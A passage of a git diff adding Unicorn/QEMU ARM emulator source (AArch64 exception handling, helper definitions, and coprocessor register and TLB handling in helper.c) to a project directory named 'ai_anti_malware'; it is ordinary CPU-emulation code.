PRIx32 "\n", + env->exception.syndrome); + } + + if (arm_is_psci_call(cpu, cs->exception_index)) { + arm_handle_psci_call(cpu); + qemu_log_mask(CPU_LOG_INT, "...handled as PSCI call\n"); + return; + } + + switch (cs->exception_index) { + case EXCP_PREFETCH_ABORT: + case EXCP_DATA_ABORT: + env->cp15.far_el[new_el] = env->exception.vaddress; + qemu_log_mask(CPU_LOG_INT, "...with FAR 0x%" PRIx64 "\n", + env->cp15.far_el[new_el]); + /* fall through */ + case EXCP_BKPT: + case EXCP_UDEF: + case EXCP_SWI: + case EXCP_HVC: + case EXCP_HYP_TRAP: + case EXCP_SMC: + env->cp15.esr_el[new_el] = env->exception.syndrome; + break; + case EXCP_IRQ: + case EXCP_VIRQ: + addr += 0x80; + break; + case EXCP_FIQ: + case EXCP_VFIQ: + addr += 0x100; + break; + default: + cpu_abort(cs, "Unhandled exception 0x%x\n", cs->exception_index); + } + + if (is_a64(env)) { + env->banked_spsr[aarch64_banked_spsr_index(new_el)] = pstate_read(env); + aarch64_save_sp(env, arm_current_el(env)); + env->elr_el[new_el] = env->pc; + } else { + env->banked_spsr[0] = cpsr_read(env); + if (!env->thumb) { + env->cp15.esr_el[new_el] |= 1 << 25; + } + env->elr_el[new_el] = env->regs[15]; + + for (i = 0; i < 15; i++) { + env->xregs[i] = env->regs[i]; + } + + env->condexec_bits = 0; + } + + pstate_write(env, PSTATE_DAIF | new_mode); + env->aarch64 = 1; + aarch64_restore_sp(env, new_el); + + env->pc = addr; + cs->interrupt_request |= CPU_INTERRUPT_EXITTB; +} +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/helper-a64.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/helper-a64.h new file mode 100644 index 0000000..1d3d10f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/helper-a64.h @@ -0,0 +1,48 @@ +/* + * AArch64 specific helper definitions + * + * Copyright (c) 2013 Alexander Graf + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ +DEF_HELPER_FLAGS_2(udiv64, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(sdiv64, TCG_CALL_NO_RWG_SE, s64, s64, s64) +DEF_HELPER_FLAGS_1(clz64, TCG_CALL_NO_RWG_SE, i64, i64) +DEF_HELPER_FLAGS_1(cls64, TCG_CALL_NO_RWG_SE, i64, i64) +DEF_HELPER_FLAGS_1(cls32, TCG_CALL_NO_RWG_SE, i32, i32) +DEF_HELPER_FLAGS_1(clz32, TCG_CALL_NO_RWG_SE, i32, i32) +DEF_HELPER_FLAGS_1(rbit64, TCG_CALL_NO_RWG_SE, i64, i64) +DEF_HELPER_3(vfp_cmps_a64, i64, f32, f32, ptr) +DEF_HELPER_3(vfp_cmpes_a64, i64, f32, f32, ptr) +DEF_HELPER_3(vfp_cmpd_a64, i64, f64, f64, ptr) +DEF_HELPER_3(vfp_cmped_a64, i64, f64, f64, ptr) +DEF_HELPER_FLAGS_5(simd_tbl, TCG_CALL_NO_RWG_SE, i64, env, i64, i64, i32, i32) +DEF_HELPER_FLAGS_3(vfp_mulxs, TCG_CALL_NO_RWG, f32, f32, f32, ptr) +DEF_HELPER_FLAGS_3(vfp_mulxd, TCG_CALL_NO_RWG, f64, f64, f64, ptr) +DEF_HELPER_FLAGS_3(neon_ceq_f64, TCG_CALL_NO_RWG, i64, i64, i64, ptr) +DEF_HELPER_FLAGS_3(neon_cge_f64, TCG_CALL_NO_RWG, i64, i64, i64, ptr) +DEF_HELPER_FLAGS_3(neon_cgt_f64, TCG_CALL_NO_RWG, i64, i64, i64, ptr) +DEF_HELPER_FLAGS_3(recpsf_f32, TCG_CALL_NO_RWG, f32, f32, f32, ptr) +DEF_HELPER_FLAGS_3(recpsf_f64, TCG_CALL_NO_RWG, f64, f64, f64, ptr) +DEF_HELPER_FLAGS_3(rsqrtsf_f32, TCG_CALL_NO_RWG, f32, f32, f32, ptr) +DEF_HELPER_FLAGS_3(rsqrtsf_f64, TCG_CALL_NO_RWG, f64, f64, f64, ptr) +DEF_HELPER_FLAGS_1(neon_addlp_s8, TCG_CALL_NO_RWG_SE, i64, i64) +DEF_HELPER_FLAGS_1(neon_addlp_u8, TCG_CALL_NO_RWG_SE, i64, i64) +DEF_HELPER_FLAGS_1(neon_addlp_s16, TCG_CALL_NO_RWG_SE, i64, i64) +DEF_HELPER_FLAGS_1(neon_addlp_u16, TCG_CALL_NO_RWG_SE, i64, i64) +DEF_HELPER_FLAGS_2(frecpx_f64, TCG_CALL_NO_RWG, f64, f64, ptr) +DEF_HELPER_FLAGS_2(frecpx_f32, TCG_CALL_NO_RWG, f32, f32, ptr) +DEF_HELPER_FLAGS_2(fcvtx_f64_to_f32, TCG_CALL_NO_RWG, f32, f64, env) +DEF_HELPER_FLAGS_3(crc32_64, TCG_CALL_NO_RWG_SE, i64, i64, i64, i32) +DEF_HELPER_FLAGS_3(crc32c_64, TCG_CALL_NO_RWG_SE, i64, i64, i64, i32) diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/helper.c new file mode 100644 index 0000000..8f65534 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/helper.c @@ -0,0 +1,5791 @@ +#include "cpu.h" +#include "internals.h" +#include "exec/helper-proto.h" +#include "qemu/host-utils.h" +#include "sysemu/sysemu.h" +#include "qemu/bitops.h" +#include "qemu/crc32c.h" +#include "exec/cpu_ldst.h" +#include "arm_ldst.h" + +#ifndef CONFIG_USER_ONLY +static inline int get_phys_addr(CPUARMState *env, target_ulong address, + int access_type, int is_user, + hwaddr *phys_ptr, int *prot, + target_ulong *page_size); + +/* Definitions for the PMCCNTR and PMCR registers */ +#define PMCRD 0x8 +#define PMCRC 0x4 +#define PMCRE 0x1 +#endif + +static uint64_t raw_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + if (cpreg_field_is_64bit(ri)) { + return CPREG_FIELD64(env, ri); + } else { + return CPREG_FIELD32(env, ri); + } +} + +static void raw_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + if (cpreg_field_is_64bit(ri)) { + CPREG_FIELD64(env, ri) = value; + } else { + CPREG_FIELD32(env, ri) = value; + } +} + +static uint64_t read_raw_cp_reg(CPUARMState *env, const ARMCPRegInfo *ri) +{ + /* Raw read of a coprocessor register (as needed for migration, etc). */ + if (ri->type & ARM_CP_CONST) { + return ri->resetvalue; + } else if (ri->raw_readfn) { + return ri->raw_readfn(env, ri); + } else if (ri->readfn) { + return ri->readfn(env, ri); + } else { + return raw_read(env, ri); + } +} + +static void write_raw_cp_reg(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t v) +{ + /* Raw write of a coprocessor register (as needed for migration, etc). + * Note that constant registers are treated as write-ignored; the + * caller should check for success by whether a readback gives the + * value written. + */ + if (ri->type & ARM_CP_CONST) { + return; + } else if (ri->raw_writefn) { + ri->raw_writefn(env, ri, v); + } else if (ri->writefn) { + ri->writefn(env, ri, v); + } else { + raw_write(env, ri, v); + } +} + +bool write_cpustate_to_list(ARMCPU *cpu) +{ + /* Write the coprocessor state from cpu->env to the (index,value) list. */ + int i; + bool ok = true; + + for (i = 0; i < cpu->cpreg_array_len; i++) { + uint32_t regidx = kvm_to_cpreg_id(cpu->cpreg_indexes[i]); + const ARMCPRegInfo *ri; + + ri = get_arm_cp_reginfo(cpu->cp_regs, regidx); + if (!ri) { + ok = false; + continue; + } + if (ri->type & ARM_CP_NO_MIGRATE) { + continue; + } + cpu->cpreg_values[i] = read_raw_cp_reg(&cpu->env, ri); + } + return ok; +} + +bool write_list_to_cpustate(ARMCPU *cpu) +{ + int i; + bool ok = true; + + for (i = 0; i < cpu->cpreg_array_len; i++) { + uint32_t regidx = kvm_to_cpreg_id(cpu->cpreg_indexes[i]); + uint64_t v = cpu->cpreg_values[i]; + const ARMCPRegInfo *ri; + + ri = get_arm_cp_reginfo(cpu->cp_regs, regidx); + if (!ri) { + ok = false; + continue; + } + if (ri->type & ARM_CP_NO_MIGRATE) { + continue; + } + /* Write value and confirm it reads back as written + * (to catch read-only registers and partially read-only + * registers where the incoming migration value doesn't match) + */ + write_raw_cp_reg(&cpu->env, ri, v); + if (read_raw_cp_reg(&cpu->env, ri) != v) { + ok = false; + } + } + return ok; +} + +static void add_cpreg_to_list(gpointer key, gpointer opaque) +{ + ARMCPU *cpu = opaque; + uint64_t regidx; + const ARMCPRegInfo *ri; + + regidx = *(uint32_t *)key; + ri = get_arm_cp_reginfo(cpu->cp_regs, regidx); + + if (!(ri->type & ARM_CP_NO_MIGRATE)) { + cpu->cpreg_indexes[cpu->cpreg_array_len] = cpreg_to_kvm_id(regidx); + /* The value array need not be initialized at this point */ + cpu->cpreg_array_len++; + } +} + +static void count_cpreg(gpointer key, gpointer opaque) +{ + ARMCPU *cpu = opaque; + uint64_t regidx; + const ARMCPRegInfo *ri; + + regidx = *(uint32_t *)key; + ri = get_arm_cp_reginfo(cpu->cp_regs, regidx); + + if (!(ri->type & ARM_CP_NO_MIGRATE)) { + cpu->cpreg_array_len++; + } +} + +static gint cpreg_key_compare(gconstpointer a, gconstpointer b) +{ + uint64_t aidx = cpreg_to_kvm_id(*(uint32_t *)a); + uint64_t bidx = cpreg_to_kvm_id(*(uint32_t *)b); + + if (aidx > bidx) { + return 1; + } + if (aidx < bidx) { + return -1; + } + return 0; +} + +static void cpreg_make_keylist(gpointer key, gpointer value, gpointer udata) +{ + GList **plist = udata; + + *plist = g_list_prepend(*plist, key); +} + +void init_cpreg_list(ARMCPU *cpu) +{ + /* Initialise the cpreg_tuples[] array based on the cp_regs hash. + * Note that we require cpreg_tuples[] to be sorted by key ID. + */ + GList *keys = NULL; + int arraylen; + + g_hash_table_foreach(cpu->cp_regs, cpreg_make_keylist, &keys); + + keys = g_list_sort(keys, cpreg_key_compare); + + cpu->cpreg_array_len = 0; + + g_list_foreach(keys, count_cpreg, cpu); + + arraylen = cpu->cpreg_array_len; + cpu->cpreg_indexes = g_new(uint64_t, arraylen); + cpu->cpreg_values = g_new(uint64_t, arraylen); + cpu->cpreg_vmstate_indexes = g_new(uint64_t, arraylen); + cpu->cpreg_vmstate_values = g_new(uint64_t, arraylen); + cpu->cpreg_vmstate_array_len = cpu->cpreg_array_len; + cpu->cpreg_array_len = 0; + + g_list_foreach(keys, add_cpreg_to_list, cpu); + + assert(cpu->cpreg_array_len == arraylen); + + g_list_free(keys); +} + +static void dacr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + + raw_write(env, ri, value); + tlb_flush(CPU(cpu), 1); /* Flush TLB as domain not tracked in TLB */ +} + +static void fcse_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + + if (raw_read(env, ri) != value) { + /* Unlike real hardware the qemu TLB uses virtual addresses, + * not modified virtual addresses, so this causes a TLB flush. + */ + tlb_flush(CPU(cpu), 1); + raw_write(env, ri, value); + } +} + +static void contextidr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + + if (raw_read(env, ri) != value && !arm_feature(env, ARM_FEATURE_MPU) + && !extended_addresses_enabled(env)) { + /* For VMSA (when not using the LPAE long descriptor page table + * format) this register includes the ASID, so do a TLB flush. + * For PMSA it is purely a process ID and no action is needed. + */ + tlb_flush(CPU(cpu), 1); + } + raw_write(env, ri, value); +} + +static void tlbiall_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + /* Invalidate all (TLBIALL) */ + ARMCPU *cpu = arm_env_get_cpu(env); + + tlb_flush(CPU(cpu), 1); +} + +static void tlbimva_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + /* Invalidate single TLB entry by MVA and ASID (TLBIMVA) */ + ARMCPU *cpu = arm_env_get_cpu(env); + + tlb_flush_page(CPU(cpu), value & TARGET_PAGE_MASK); +} + +static void tlbiasid_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + /* Invalidate by ASID (TLBIASID) */ + ARMCPU *cpu = arm_env_get_cpu(env); + + tlb_flush(CPU(cpu), value == 0); +} + +static void tlbimvaa_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + /* Invalidate single entry by MVA, all ASIDs (TLBIMVAA) */ + ARMCPU *cpu = arm_env_get_cpu(env); + + tlb_flush_page(CPU(cpu), value & TARGET_PAGE_MASK); +} + +/* IS variants of TLB operations must affect all cores */ +static void tlbiall_is_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + //struct uc_struct *uc = env->uc; + // TODO: issue #642 + // tlb_flush(other_cpu, 1); +} + +static void tlbiasid_is_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + //struct uc_struct *uc = env->uc; + // TODO: issue #642 + // tlb_flush(other_cpu, value == 0); +} + +static void tlbimva_is_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + //struct uc_struct *uc = env->uc; + // TODO: issue #642 + // tlb_flush(other_cpu, value & TARGET_PAGE_MASK); +} + +static void tlbimvaa_is_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + //struct uc_struct *uc = env->uc; + // TODO: issue #642 + // tlb_flush(other_cpu, value & TARGET_PAGE_MASK); +} + +static const ARMCPRegInfo cp_reginfo[] = { + { "FCSEIDR", 15,13,0, 0,0,0, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c13_fcse), + NULL, NULL, fcse_write, NULL, raw_write, NULL, }, + { "CONTEXTIDR", 0,13,0, 3,0,1, ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.contextidr_el1), + NULL, NULL, contextidr_write, NULL, raw_write, NULL, }, + REGINFO_SENTINEL +}; + +static const ARMCPRegInfo not_v8_cp_reginfo[] = { + /* NB: Some of these registers exist in v8 but with more precise + * definitions that don't use CP_ANY wildcards (mostly in v8_cp_reginfo[]). + */ + /* MMU Domain access control / MPU write buffer control */ + { "DACR", 15,3,CP_ANY, 0,CP_ANY,CP_ANY, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c3), + NULL, NULL, dacr_write, NULL, raw_write, NULL, }, + /* ??? This covers not just the impdef TLB lockdown registers but also + * some v7VMSA registers relating to TEX remap, so it is overly broad. + */ + { "TLB_LOCKDOWN", 15,10,CP_ANY, 0,CP_ANY,CP_ANY, 0, + ARM_CP_NOP, PL1_RW, }, + /* Cache maintenance ops; some of this space may be overridden later. */ + { "CACHEMAINT", 15,7,CP_ANY, 0,0,CP_ANY, 0, + ARM_CP_NOP | ARM_CP_OVERRIDE, PL1_W, }, + REGINFO_SENTINEL +}; + +static const ARMCPRegInfo not_v6_cp_reginfo[] = { + /* Not all pre-v6 cores implemented this WFI, so this is slightly + * over-broad. + */ + { "WFI_v5", 15,7,8, 0,0,2, 0, + ARM_CP_WFI, PL1_W, }, + REGINFO_SENTINEL +}; + +static const ARMCPRegInfo not_v7_cp_reginfo[] = { + /* Standard v6 WFI (also used in some pre-v6 cores); not in v7 (which + * is UNPREDICTABLE; we choose to NOP as most implementations do). + */ + { "WFI_v6", 15,7,0, 0,0,4, 0, + ARM_CP_WFI, PL1_W, }, + /* L1 cache lockdown. Not architectural in v6 and earlier but in practice + * implemented in 926, 946, 1026, 1136, 1176 and 11MPCore. StrongARM and + * OMAPCP will override this space. + */ + { "DLOCKDOWN", 15,9,0, 0,0,0, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c9_data), }, + { "ILOCKDOWN", 15,9,0, 0,0,1, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c9_insn), }, + /* v6 doesn't have the cache ID registers but Linux reads them anyway */ + { "DUMMY", 15,0,0, 0,1,CP_ANY, 0, + ARM_CP_CONST | ARM_CP_NO_MIGRATE, PL1_R, NULL, 0 }, + /* We don't implement pre-v7 debug but most CPUs had at least a DBGDIDR; + * implementing it as RAZ means the "debug architecture version" bits + * will read as a reserved value, which should cause Linux to not try + * to use the debug hardware. + */ + { "DBGDIDR", 14,0,0, 0,0,0, 0, + ARM_CP_CONST, PL0_R, NULL, 0 }, + /* MMU TLB control. Note that the wildcarding means we cover not just + * the unified TLB ops but also the dside/iside/inner-shareable variants. + */ + { "TLBIALL", 15,8,CP_ANY, 0,CP_ANY,0, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbiall_write, }, + { "TLBIMVA", 15,8,CP_ANY, 0,CP_ANY,1, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbimva_write, }, + { "TLBIASID", 15,8,CP_ANY, 0,CP_ANY,2, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbiasid_write, }, + { "TLBIMVAA", 15,8,CP_ANY, 0,CP_ANY,3, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbimvaa_write, }, + REGINFO_SENTINEL +}; + +static void cpacr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + uint32_t mask = 0; + + /* In ARMv8 most bits of CPACR_EL1 are RES0. */ + if (!arm_feature(env, ARM_FEATURE_V8)) { + /* ARMv7 defines bits for unimplemented coprocessors as RAZ/WI. + * ASEDIS [31] and D32DIS [30] are both UNK/SBZP without VFP. + * TRCDIS [28] is RAZ/WI since we do not implement a trace macrocell. + */ + if (arm_feature(env, ARM_FEATURE_VFP)) { + /* VFP coprocessor: cp10 & cp11 [23:20] */ + mask |= (1U << 31) | (1 << 30) | (0xf << 20); + + if (!arm_feature(env, ARM_FEATURE_NEON)) { + /* ASEDIS [31] bit is RAO/WI */ + value |= (1U << 31); + } + + /* VFPv3 and upwards with NEON implement 32 double precision + * registers (D0-D31). + */ + if (!arm_feature(env, ARM_FEATURE_NEON) || + !arm_feature(env, ARM_FEATURE_VFP3)) { + /* D32DIS [30] is RAO/WI if D16-31 are not implemented. */ + value |= (1 << 30); + } + } + value &= mask; + } + env->cp15.c1_coproc = value; +} + +static const ARMCPRegInfo v6_cp_reginfo[] = { + /* prefetch by MVA in v6, NOP in v7 */ + { "MVA_prefetch", 15,7,13, 0,0,1, 0, + ARM_CP_NOP, PL1_W, }, + { "ISB", 15,7,5, 0,0,4, 0, + ARM_CP_NOP, PL0_W, }, + { "DSB", 15,7,10, 0,0,4, 0, + ARM_CP_NOP, PL0_W, }, + { "DMB", 15,7,10, 0,0,5, 0, + ARM_CP_NOP, PL0_W, }, + { "IFAR", 15,6,0, 0,0,2, 0, + 0, PL1_RW, NULL, 0, offsetofhigh32(CPUARMState, cp15.far_el[1]), }, + /* Watchpoint Fault Address Register : should actually only be present + * for 1136, 1176, 11MPCore. + */ + { "WFAR", 15,6,0, 0,0,1, 0, + ARM_CP_CONST, PL1_RW, NULL, 0, }, + { "CPACR", 0,1,0, 3,0,2, ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c1_coproc), + NULL, NULL, cpacr_write }, + REGINFO_SENTINEL +}; + +static CPAccessResult pmreg_access(CPUARMState *env, const ARMCPRegInfo *ri) +{ + /* Performance monitor registers user accessibility is controlled + * by PMUSERENR. + */ + if (arm_current_el(env) == 0 && !env->cp15.c9_pmuserenr) { + return CP_ACCESS_TRAP; + } + return CP_ACCESS_OK; +} + +#ifndef CONFIG_USER_ONLY + +static inline bool arm_ccnt_enabled(CPUARMState *env) +{ + /* This does not support checking PMCCFILTR_EL0 register */ + + if (!(env->cp15.c9_pmcr & PMCRE)) { + return false; + } + + return true; +} + +void pmccntr_sync(CPUARMState *env) +{ + uint64_t temp_ticks; + + temp_ticks = muldiv64(qemu_clock_get_us(QEMU_CLOCK_VIRTUAL), + get_ticks_per_sec(), 1000000); + + if (env->cp15.c9_pmcr & PMCRD) { + /* Increment once every 64 processor clock cycles */ + temp_ticks /= 64; + } + + if (arm_ccnt_enabled(env)) { + env->cp15.c15_ccnt = temp_ticks - env->cp15.c15_ccnt; + } +} + +static void pmcr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + pmccntr_sync(env); + + if (value & PMCRC) { + /* The counter has been reset */ + env->cp15.c15_ccnt = 0; + } + + /* only the DP, X, D and E bits are writable */ + env->cp15.c9_pmcr &= ~0x39; + env->cp15.c9_pmcr |= (value & 0x39); + + pmccntr_sync(env); +} + +static uint64_t pmccntr_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + uint64_t total_ticks; + + if (!arm_ccnt_enabled(env)) { + /* Counter is disabled, do not change value */ + return env->cp15.c15_ccnt; + } + + total_ticks = muldiv64(qemu_clock_get_us(QEMU_CLOCK_VIRTUAL), + get_ticks_per_sec(), 1000000); + + if (env->cp15.c9_pmcr & PMCRD) { + /* Increment once every 64 processor clock cycles */ + total_ticks /= 64; + } + return total_ticks - env->cp15.c15_ccnt; +} + +static void pmccntr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + uint64_t total_ticks; + + if (!arm_ccnt_enabled(env)) { + /* Counter is disabled, set the absolute value */ + env->cp15.c15_ccnt = value; + return; + } + + total_ticks = muldiv64(qemu_clock_get_us(QEMU_CLOCK_VIRTUAL), + get_ticks_per_sec(), 1000000); + + if (env->cp15.c9_pmcr & PMCRD) { + /* Increment once every 64 processor clock cycles */ + total_ticks /= 64; + } + env->cp15.c15_ccnt = total_ticks - value; +} + +static void pmccntr_write32(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + uint64_t cur_val = pmccntr_read(env, NULL); + + pmccntr_write(env, ri, deposit64(cur_val, 0, 32, value)); +} + +#else /* CONFIG_USER_ONLY */ + +void pmccntr_sync(CPUARMState *env) +{ +} + +#endif + +static void pmccfiltr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + pmccntr_sync(env); + env->cp15.pmccfiltr_el0 = value & 0x7E000000; + pmccntr_sync(env); +} + +static void pmcntenset_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + value &= (1U << 31); + env->cp15.c9_pmcnten |= value; +} + +static void pmcntenclr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + value &= (1U << 31); + env->cp15.c9_pmcnten &= ~value; +} + +static void pmovsr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + env->cp15.c9_pmovsr &= ~value; +} + +static void pmxevtyper_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + env->cp15.c9_pmxevtyper = value & 0xff; +} + +static void pmuserenr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + env->cp15.c9_pmuserenr = value & 1; +} + +static void pmintenset_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + /* We have no event counters so only the C bit can be changed */ + value &= (1U << 31); + env->cp15.c9_pminten |= value; +} + +static void pmintenclr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + value &= (1U << 31); + env->cp15.c9_pminten &= ~value; +} + +static void vbar_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + /* Note that even though the AArch64 view of this register has bits + * [10:0] all RES0 we can only mask the bottom 5, to comply with the + * architectural requirements for bits which are RES0 only in some + * contexts. (ARMv8 would permit us to do no masking at all, but ARMv7 + * requires the bottom five bits to be RAZ/WI because they're UNK/SBZP.) + */ + raw_write(env, ri, value & ~0x1FULL); +} + +static void scr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) +{ + /* We only mask off bits that are RES0 both for AArch64 and AArch32. + * For bits that vary between AArch32/64, code needs to check the + * current execution mode before directly using the feature bit. + */ + uint32_t valid_mask = SCR_AARCH64_MASK | SCR_AARCH32_MASK; + + if (!arm_feature(env, ARM_FEATURE_EL2)) { + valid_mask &= ~SCR_HCE; + + /* On ARMv7, SMD (or SCD as it is called in v7) is only + * supported if EL2 exists. The bit is UNK/SBZP when + * EL2 is unavailable. In QEMU ARMv7, we force it to always zero + * when EL2 is unavailable. + */ + if (arm_feature(env, ARM_FEATURE_V7)) { + valid_mask &= ~SCR_SMD; + } + } + + /* Clear all-context RES0 bits. */ + value &= valid_mask; + raw_write(env, ri, value); +} + +static uint64_t ccsidr_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + return cpu->ccsidr[env->cp15.c0_cssel]; +} + +static void csselr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + raw_write(env, ri, value & 0xf); +} + +static uint64_t isr_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + CPUState *cs = ENV_GET_CPU(env); + uint64_t ret = 0; + + if (cs->interrupt_request & CPU_INTERRUPT_HARD) { + ret |= CPSR_I; + } + if (cs->interrupt_request & CPU_INTERRUPT_FIQ) { + ret |= CPSR_F; + } + /* External aborts are not possible in QEMU so A bit is always clear */ + return ret; +} + +static const ARMCPRegInfo v7_cp_reginfo[] = { + /* the old v6 WFI, UNPREDICTABLE in v7 but we choose to NOP */ + { "NOP", 15,7,0, 0,0,4, 0, + ARM_CP_NOP, PL1_W, }, + /* Performance monitors are implementation defined in v7, + * but with an ARM recommended set of registers, which we + * follow (although we don't actually implement any counters) + * + * Performance registers fall into three categories: + * (a) always UNDEF in PL0, RW in PL1 (PMINTENSET, PMINTENCLR) + * (b) RO in PL0 (ie UNDEF on write), RW in PL1 (PMUSERENR) + * (c) UNDEF in PL0 if PMUSERENR.EN==0, otherwise accessible (all others) + * For the cases controlled by PMUSERENR we must set .access to PL0_RW + * or PL0_RO as appropriate and then check PMUSERENR in the helper fn. + */ + { "PMCNTENSET", 15,9,12, 0,0,1, 0, + ARM_CP_NO_MIGRATE, PL0_RW, NULL, 0, offsetoflow32(CPUARMState, cp15.c9_pmcnten), + pmreg_access, NULL, pmcntenset_write, NULL, raw_write }, + { "PMCNTENSET_EL0", 0,9,12, 3,3,1, ARM_CP_STATE_AA64, + 0, PL0_RW, NULL, 0, offsetof(CPUARMState, cp15.c9_pmcnten), + pmreg_access, NULL, pmcntenset_write, NULL, raw_write }, + { "PMCNTENCLR", 15,9,12, 0,0,2, 0, + ARM_CP_NO_MIGRATE, PL0_RW, NULL, 0, offsetoflow32(CPUARMState, cp15.c9_pmcnten), + pmreg_access, NULL, pmcntenclr_write, }, + { "PMCNTENCLR_EL0", 0,9,12, 3,3,2, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL0_RW, NULL, 0, offsetof(CPUARMState, cp15.c9_pmcnten), + pmreg_access, NULL, pmcntenclr_write }, + { "PMOVSR", 15,9,12, 0,0,3, 0, + 0, PL0_RW, NULL, 0, offsetof(CPUARMState, cp15.c9_pmovsr), + pmreg_access, NULL, pmovsr_write, NULL, raw_write }, + /* Unimplemented so WI. */ + { "PMSWINC", 15,9,12, 0,0,4, 0, + ARM_CP_NOP, PL0_W, NULL, 0, 0, + pmreg_access, }, + /* Since we don't implement any events, writing to PMSELR is UNPREDICTABLE. + * We choose to RAZ/WI. + */ + { "PMSELR", 15,9,12, 0,0,5, 0, + ARM_CP_CONST, PL0_RW, NULL, 0, 0, + pmreg_access }, +#ifndef CONFIG_USER_ONLY + { "PMCCNTR", 15,9,13, 0,0,0, 0, + ARM_CP_IO, PL0_RW, NULL, 0, 0, + pmreg_access, pmccntr_read, pmccntr_write32, }, + { "PMCCNTR_EL0", 0,9,13, 3,3,0, ARM_CP_STATE_AA64, + ARM_CP_IO, PL0_RW, NULL, 0, 0, + pmreg_access, pmccntr_read, pmccntr_write, }, +#endif + { "PMCCFILTR_EL0", 0,14,15, 3,3,7, ARM_CP_STATE_AA64, + ARM_CP_IO, PL0_RW, NULL, 0, offsetof(CPUARMState, cp15.pmccfiltr_el0), + pmreg_access, NULL, pmccfiltr_write, }, + { "PMXEVTYPER", 15,9,13, 0,0,1, 0, + 0, PL0_RW, NULL, 0, offsetof(CPUARMState, cp15.c9_pmxevtyper), + pmreg_access, NULL, pmxevtyper_write, NULL, raw_write }, + /* Unimplemented, RAZ/WI. */ + { "PMXEVCNTR", 15,9,13, 0,0,2, 0, + ARM_CP_CONST, PL0_RW, NULL, 0, 0, + pmreg_access }, + { "PMUSERENR", 15,9,14, 0,0,0, 0, + 0, PL0_R | PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c9_pmuserenr), + NULL, NULL, pmuserenr_write, NULL, raw_write }, + { "PMINTENSET", 15,9,14, 0,0,1, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c9_pminten), + NULL, NULL, pmintenset_write, NULL, raw_write }, + { "PMINTENCLR", 15,9,14, 0,0,2, 0, + ARM_CP_NO_MIGRATE, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c9_pminten), + NULL, NULL, pmintenclr_write, }, + { "VBAR", 0,12,0, 3,0,0, ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.vbar_el[1]), + 